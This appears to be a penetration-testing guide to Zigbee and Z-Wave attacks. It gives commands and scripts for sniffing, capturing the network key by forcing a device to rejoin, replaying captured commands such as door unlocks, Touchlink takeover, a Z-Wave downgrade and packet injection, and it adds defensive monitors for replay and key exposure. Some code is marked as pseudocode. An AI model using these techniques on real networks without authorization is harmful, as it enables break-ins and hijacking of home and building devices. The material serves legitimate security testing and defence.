# Zigbee and Z-Wave Attacks

## Overview

Zigbee (IEEE 802.15.4) and Z-Wave are short-range, low-power wireless protocols used in smart home automation, building management, and industrial IoT. Both protocols prioritize low power consumption over security, creating attack surfaces for replay attacks, key extraction, and device hijacking.

## Zigbee Architecture

| Layer | Protocol | Function |
| --- | --- | --- |
| Physical | IEEE 802.15.4 | 2.4 GHz ISM band, 16 channels |
| MAC | IEEE 802.15.4 | Channel access, frame formatting |
| Network | Zigbee NWK | Mesh routing, joining, security |
| Application | Zigbee APS/ZCL | Application profiles, clusters |

## Zigbee Security

  • Network key (NWK key): 128-bit AES key shared by all devices in the network
  • Link key: 128-bit AES key for device joining (application layer)
  • Default Trust Center link key: 5A6967426565416C6C69616E63653039 (ZigBeeAlliance09)
  • Transport key: Network key is sent in cleartext during device joining (if using the default link key)

## Attack Decision Tree

```text
Zigbee/Z-Wave Target Identified?
  |
  |-- Zigbee
  |     |-- Device joining in progress? --> Capture NWK key (transport key attack)
  |     |-- Known network key? --> Decrypt all traffic
  |     |-- Unknown network key? --> Replay attack or key extraction
  |     |-- Touchlink commissioning? --> Touchlink attack
  |
  |-- Z-Wave
        |-- Known Home ID? --> Z-Wave network enumeration
        |-- Z-Wave Plus device? --> SmartStart attack
        |-- Legacy Z-Wave? --> Downgrade attack
```

## Zigbee Attacks

### Zigbee Network Discovery

```bash
# Using KillerBee framework
git clone https://github.com/riverloopsec/killerbee.git
cd killerbee && pip install .

# Discover Zigbee networks
sudo zbstumbler -C 11

# Capture Zigbee traffic
sudo zbdump -c 11 -w zigbee_capture.pcap

# Or with KillerBee Python API
python3 << 'EOF'
from killerbee import KillerBee

kb = KillerBee()          # opens the first supported 802.15.4 device
kb.set_channel(11)
kb.sniffer_on()
for i in range(100):
    # pnext() returns a dict (raw frame under 'bytes', plus 'rssi', 'validcrc', ...)
    # or None when the receive timeout expires
    pkt = kb.pnext()
    if pkt:
        print(f"Packet: {pkt['bytes'].hex()}")
kb.sniffer_off()
kb.close()
EOF
```

### Transport Key Attack (Network Key Capture)

This is the most impactful Zigbee attack: when a device joins a Zigbee network using the default Trust Center link key, the network key is sent over the air protected only by that well-known key, which is effectively cleartext.

```bash
# Step 1: Monitor for device joining
sudo zbdump -c 11 -w joining.pcap

# Step 2: Force a device to rejoin (deauthenticate)
# This triggers the transport key exchange
sudo zbreplay -i -c 11 -f deauth.pcap

# Step 3: Extract the network key from the capture
python3 << 'EOF'
from killerbee import KillerBee

kb = KillerBee()
kb.set_channel(11)
kb.sniffer_on()

# Look for the APS command carrying the transport key
# The network key is in the "Transport Key" frame (APS command identifier 0x05)
# Decrypt using the default link key: ZigBeeAlliance09
kb.sniffer_off()
kb.close()
EOF
```

### Zigbee Replay Attack

Capture a Zigbee command (e.g., "unlock door") and replay it later.

```bash
# Capture Zigbee traffic
sudo zbdump -c 11 -w zigbee_capture.pcap

# Find the packet to replay (e.g., a door unlock command)
# Analyze in Wireshark: filter "zbee_nwk"

# Replay the captured packet
sudo zbreplay -c 11 -f zigbee_capture.pcap

# Or replay a specific packet with modified parameters
sudo zbreplay -c 11 -f specific_command.pcap -d <delay_ms>
```
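The two exposures described in the Zigbee Security, Transport Key and Replay sections above are also the two things a network owner can detect passively. The following is an added example, not code from the module or from the KillerBee project: a monitor that consumes already-decoded frame metadata (the `NwkFrame` records and the sample sequence are constructed for the example; a real deployment would fill them from a dissector) and flags a Transport Key command sent under the default Trust Center link key, plus any frame whose NWK security frame counter fails to advance, which is how the Zigbee receiver itself rejects replays.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Well-known default Trust Center link key ("ZigBeeAlliance09") quoted in the module
DEFAULT_TC_LINK_KEY = bytes.fromhex("5A6967426565416C6C69616E63653039")
APS_CMD_TRANSPORT_KEY = 0x05  # APS command identifier of the Transport Key command


@dataclass
class NwkFrame:
    """Fields a dissector would hand the monitor (constructed for this example)."""
    src: int                          # 16-bit NWK source address
    frame_counter: int                # 32-bit NWK security frame counter
    aps_cmd: Optional[int] = None     # APS command id when the frame is an APS command
    link_key: Optional[bytes] = None  # link key that protected the APS payload, if known


@dataclass
class ZigbeeMonitor:
    """Tracks the highest accepted frame counter per source and collects alerts."""
    highest_counter: Dict[int, int] = field(default_factory=dict)
    alerts: List[str] = field(default_factory=list)

    def observe(self, f: NwkFrame) -> None:
        # Replay check: the NWK layer only accepts a frame whose counter is strictly
        # greater than the last one accepted from that source, so a counter that does
        # not advance is a duplicate or a replayed frame.
        last = self.highest_counter.get(f.src)
        if last is not None and f.frame_counter <= last:
            self.alerts.append(
                f"REPLAY src=0x{f.src:04x} counter={f.frame_counter} (last accepted {last})")
            return
        self.highest_counter[f.src] = f.frame_counter

        # Key exposure check: a Transport Key command protected only by the default
        # link key hands the network key to anyone who captured the join.
        if f.aps_cmd == APS_CMD_TRANSPORT_KEY:
            if f.link_key == DEFAULT_TC_LINK_KEY:
                self.alerts.append(
                    f"NWK KEY EXPOSED src=0x{f.src:04x}: transport key sent under default TC link key")
            else:
                self.alerts.append(f"JOIN src=0x{f.src:04x}: transport key under a unique link key")


def run_demo() -> List[str]:
    """Constructed sequence: a join under the default key, normal traffic, then a replay."""
    frames = [
        NwkFrame(src=0x0000, frame_counter=100,
                 aps_cmd=APS_CMD_TRANSPORT_KEY, link_key=DEFAULT_TC_LINK_KEY),
        NwkFrame(src=0x4A2B, frame_counter=1),
        NwkFrame(src=0x4A2B, frame_counter=2),
        NwkFrame(src=0x4A2B, frame_counter=2),  # same counter again: a replayed command
        NwkFrame(src=0x4A2B, frame_counter=3),
    ]
    mon = ZigbeeMonitor()
    for f in frames:
        mon.observe(f)
    return mon.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The counter table is keyed only by source address; a real monitor also has to reset an entry when the network key is switched (Switch Key command), because devices legitimately restart their counters at that point, and it should treat a counter that jumps backwards after a rejoin as a separate event from a plain duplicate.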

### Zigbee Key Extraction

```bash
# Using KillerBee to extract keys from captures
# NOTE: ZBGPKeyCracker, killerbee.zbgpcracker and set_key are illustrative names;
# they are not part of the KillerBee package, so treat this block as pseudocode.
python3 << 'EOF'
from killerbee import *
from killerbee.zbgpcracker import *

# Crack the network key from a transport key capture
cracker = ZBGPKeyCracker()
cracker.crack_key('joining.pcap', 'ZigBeeAlliance09')

# If the link key is known, decrypt all traffic
kb = KillerBee()
kb.set_channel(11)
kb.set_key(NWK_KEY)
kb.sniffer_on()
EOF
```

### Touchlink Attack

Touchlink (ZLL) commissioning allows devices to join by proximity. If Touchlink commissioning is enabled, an attacker within range can join the network.

```bash
# Scan for Touchlink-enabled devices
# NOTE: send_touchlink_scan is an illustrative name, not a KillerBee method;
# treat this block as pseudocode.
python3 << 'EOF'
from killerbee import *

kb = KillerBee()
# Send Touchlink scan request on all channels
for channel in range(11, 27):
    kb.set_channel(channel)
    kb.send_touchlink_scan()
    # Check for responses
kb.close()
EOF

# If a Touchlink device responds, it can be:
# 1. Reset to factory defaults
# 2. Forced to join an attacker's network
# 3. Made to leave its current network
```

## Z-Wave Attacks

### Z-Wave Network Discovery

```bash
# Using Z-Wave sniffing tools
# Requires: Z-Wave stick (Z-Stick, Aeotec, etc.)

# Enumerate Z-Wave network (python-openzwave; lists the nodes paired with this controller)
python3 << 'EOF'
import time
from openzwave.option import ZWaveOption
from openzwave.network import ZWaveNetwork

# config_path is the OpenZWave device database directory; adjust to your install
options = ZWaveOption('/dev/ttyACM0', config_path='/usr/share/openzwave/config', user_path='.')
options.lock()
network = ZWaveNetwork(options, autostart=True)
while network.state < network.STATE_AWAKED:  # wait for the controller to query its nodes
    time.sleep(1)
for node_id, node in network.nodes.items():
    print(f"Node {node_id}: {node.product_name} ({node.product_type})")
network.stop()
EOF
```

### Z-Wave Downgrade Attack

Z-Wave Plus (500 series) devices use AES-128 encryption. However, some devices fall back to the older Z-Wave protocol (legacy) which uses a weaker XOR-based encryption. An attacker can force this downgrade.

```bash
# Z-Wave downgrade attack
# 1. Capture Z-Wave traffic from a Z-Wave Plus device
# 2. Modify the protocol version in the packet
# 3. Re-transmit with the downgraded version
# 4. The target device processes the command using legacy encryption

# Using Z-Wave radio tools:
# Requires hardware: Z-Stick + custom firmware

# The attack exploits:
# - Z-Wave protocol version negotiation
# - Legacy devices accept commands in the old format
# - AES-128 is bypassed by downgrading to XOR encryption
```

### Z-Wave Packet Injection

```bash
# Using RFcat (requires YardStick One or similar CC1111-based radio)
python3 << 'EOF'
from rflib import *

# Initialize RFcat
d = RfCat()

# Set Z-Wave frequency (varies by region)
d.setFreq(868420000)  # EU
# d.setFreq(908420000)  # US

# Set modulation: Z-Wave R1/R2 use FSK (rflib exposes this as setMdmModulation;
# the setModem/MOD_ASK names in the original snippet do not exist in rflib)
d.setMdmModulation(MOD_2FSK)

# Transmit Z-Wave packet
# Z-Wave frames: Preamble + SOF + Length + Payload + CRC
d.RFxmit(b'\x00\x00\x00\x00\x00\x00\x00\x00')  # Placeholder frame
EOF
```
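The frame layout that the comment above only names, and the Home ID that the Z-Wave Network Discovery section relies on, are easiest to understand from a decoder. The following is an added example, not code from the module or from any of the listed tools: it parses the MAC frame that follows the PHY preamble and SOF (Home ID, source node, frame control, length, destination node, payload, checksum), validates the 8-bit XOR checksum used at the 9.6/40 kbps rates, and gives a monitor-side verdict that flags frames from a Home ID the defender has not paired with. The field layout is the publicly documented ITU-T G.9959 singlecast format; the sample frame bytes, the Home ID `C0FFEE01` and the frame-control value are constructed.

```python
from dataclasses import dataclass
from typing import Optional, Set


@dataclass
class ZWaveFrame:
    home_id: int
    src_node: int
    frame_control: int
    length: int
    dst_node: int
    payload: bytes
    checksum: int
    checksum_ok: bool


def zwave_checksum(data: bytes) -> int:
    """8-bit checksum used at the 9.6/40 kbps rates: XOR of every byte, seeded with 0xFF."""
    c = 0xFF
    for b in data:
        c ^= b
    return c


def parse_zwave_frame(raw: bytes) -> Optional[ZWaveFrame]:
    """Parse a singlecast MAC frame; None if the frame is too short or its length field lies."""
    if len(raw) < 10:           # 4 + 1 + 2 + 1 + 1 header bytes plus the 1-byte checksum
        return None
    length = raw[7]
    if length != len(raw):      # the length field counts the whole frame including the checksum
        return None
    return ZWaveFrame(
        home_id=int.from_bytes(raw[0:4], "big"),
        src_node=raw[4],
        frame_control=int.from_bytes(raw[5:7], "big"),
        length=length,
        dst_node=raw[8],
        payload=raw[9:-1],
        checksum=raw[-1],
        checksum_ok=zwave_checksum(raw[:-1]) == raw[-1],
    )


def classify(raw: bytes, known_home_ids: Set[int]) -> str:
    """Monitor verdict: malformed, bad-checksum, foreign-home-id (not one of ours), or ok."""
    f = parse_zwave_frame(raw)
    if f is None:
        return "malformed"
    if not f.checksum_ok:
        return "bad-checksum"
    if f.home_id not in known_home_ids:
        return "foreign-home-id"
    return "ok"


# Constructed sample: Home ID C0FFEE01, node 1 -> node 5, frame control 0x4101,
# length 0x0D, payload 20 01 FF (COMMAND_CLASS_BASIC / BASIC_SET 0xFF), checksum 0xB8.
SAMPLE_FRAME = bytes.fromhex("C0FFEE01 01 4101 0D 05 2001FF B8")
OUR_HOME_IDS = {0xC0FFEE01}  # Home IDs of the controllers we operate (constructed)

if __name__ == "__main__":
    f = parse_zwave_frame(SAMPLE_FRAME)
    print(f"home=0x{f.home_id:08X} src={f.src_node} dst={f.dst_node} "
          f"payload={f.payload.hex()} checksum_ok={f.checksum_ok}")
    print(classify(SAMPLE_FRAME, OUR_HOME_IDS))
```

Frames sent at the 100 kbps rate carry a 16-bit CRC instead of this XOR byte, so a monitor that sees both rates has to pick the check by the rate the radio received the frame on. A "foreign-home-id" verdict on its own only means another Z-Wave network is in range; a sudden run of them, or frames that carry one of your own Home IDs from a node number you never included, is what is worth alerting on.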

## IoT Device Identification via Wireless Fingerprinting

```bash
# Identify device types by their wireless signatures

# Zigbee device fingerprinting
python3 << 'EOF'
from killerbee import *

# Each Zigbee device has:
# - IEEE address (64-bit, assigned by manufacturer)
# - Network address (16-bit, assigned by coordinator)
# - Device type (coordinator, router, end device)
# - Power source (mains, battery)
# - Receive mode (always on, periodically on)

kb = KillerBee()
# List device profiles by IEEE OUI
# Zigbee OUI prefixes:
#   00:12:4B - Digi International
#   00:0D:6F - Ember
#   00:50:C2 - Philips Hue
#   00:15:8A - Telldus
kb.close()
EOF
```

## Practical Methodology

  1. Reconnaissance: Use zbstumbler and Z-Wave tools to discover networks
  2. Traffic capture: Capture Zigbee traffic on channels 11-26 and Z-Wave traffic at 868/908 MHz
  3. Key extraction: Capture device joining to extract the network key
  4. Decryption: Decrypt all traffic using the extracted key
  5. Replay: Identify and replay interesting commands (unlock, open, activate)
  6. Injection: Craft and inject custom commands
  7. Report: Document all vulnerabilities with packet captures

## Common Pitfalls

  1. Zigbee channels overlap with WiFi: Channels 15, 20 and 25 suffer the least WiFi interference. Check for WiFi interference before choosing a capture channel.
  2. Z-Wave regional frequencies: Z-Wave uses different frequencies in different regions (868 MHz EU, 908 MHz US, 919 MHz ANZ).
  3. Zigbee network key rotation: Some networks rotate the network key, requiring re-capture.
  4. Z-Wave AES-128: Newer Z-Wave Plus devices use AES-128, which is not vulnerable to downgrade.
  5. Touchlink range: Touchlink commissioning only works within roughly 40 cm of the target device.

## OPSEC Considerations

  • Zigbee transmissions on 2.4 GHz are detectable by any Zigbee sniffer in range
  • Z-Wave transmissions are detectable by any Z-Wave sniffer in range
  • Replay attacks duplicate legitimate commands — defenders can correlate timestamps
  • Transport key capture is passive until the device is forced to rejoin
  • Always verify scope includes IoT device testing

## Cross-References

### Tool References

| Tool | Purpose | Link |
| --- | --- | --- |
| KillerBee | Zigbee attack framework | https://github.com/riverloopsec/killerbee |
| zbstumbler | Zigbee network discovery | KillerBee suite |
| zbdump | Zigbee packet capture | KillerBee suite |
| zbreplay | Zigbee packet replay | KillerBee suite |
| RFcat | Sub-GHz radio tool | https://github.com/atlas0fd00m/rfcat |
| OpenZWave | Z-Wave controller library | https://github.com/OpenZWave/open-zwave |
| Z-Wave.me | Z-Wave tools and SDK | https://z-wave.me/ |